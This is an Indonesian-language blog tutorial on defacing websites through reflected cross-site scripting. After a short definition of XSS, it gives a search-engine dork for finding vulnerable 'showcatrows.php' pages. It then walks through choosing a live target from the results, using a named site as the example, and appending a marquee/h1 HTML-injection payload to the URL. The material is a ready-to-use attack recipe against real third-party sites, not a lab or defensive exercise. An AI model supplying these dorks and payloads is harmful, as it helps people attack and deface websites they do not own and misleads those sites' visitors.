Pengertian XSS
XSS merupakan kependekan yang digunakan untuk istilah cross site scripting.
XSS merupakan salah satu jenis serangan injeksi code (code injection attack). XSS dilakukan oleh penyerang dengan cara memasukkan kode HTML atau client script code lainnya ke suatu situs. Serangan ini akan seolah-olah datang dari situs tersebut. Akibat serangan ini antara lain penyerang dapat mem-bypass keamanan di sisi klien, mendapatkan informasi sensitif, atau menyimpan aplikasi berbahaya.
Alasan kependekan yang digunakan XSS bukan CSS karena CSS sudah digunakan untuk cascade style sheet.
Dork XSS
Dork XSS yang masih work sampai saat ini.
inurl:"/showcatrows.php?CategoryID="
Langkah Deface dengan XSS
1. Pertama Copy Dork yang telah gw sediain, paste and search di browser tercinta anda :D, kemudian akan ada banyak targe tuh yang sesuai dengan Dorknya, pilih salah satu target dan buka di tab baru :D
 |
| Cara Deface Website Metode XSS Vulnerability |
2. Ok ini contoh web target saya dengan URL seperti dibawah ini.
http://www.paypalshop.org/showcatrows.php?CategoryID=5
 |
| Cara Deface Website Metode XSS Vulnerability |
3. Kemudian tambahkan script dibawah ini diURL paling belakang.
"><marquee><h1>DEFACED BY D704T</h1></marquee>
Contoh
http://www.paypalshop.org/showcatrows.php?CategoryID=5"><marquee><h1>NG3NT0T BY LOLY704</h1></marquee>
Warna Hitam adalah URL asli dan warna Merah adalah Script XSS kita :D
 |
| Cara Deface Website Metode XSS Vulnerability |
ADS HERE !!!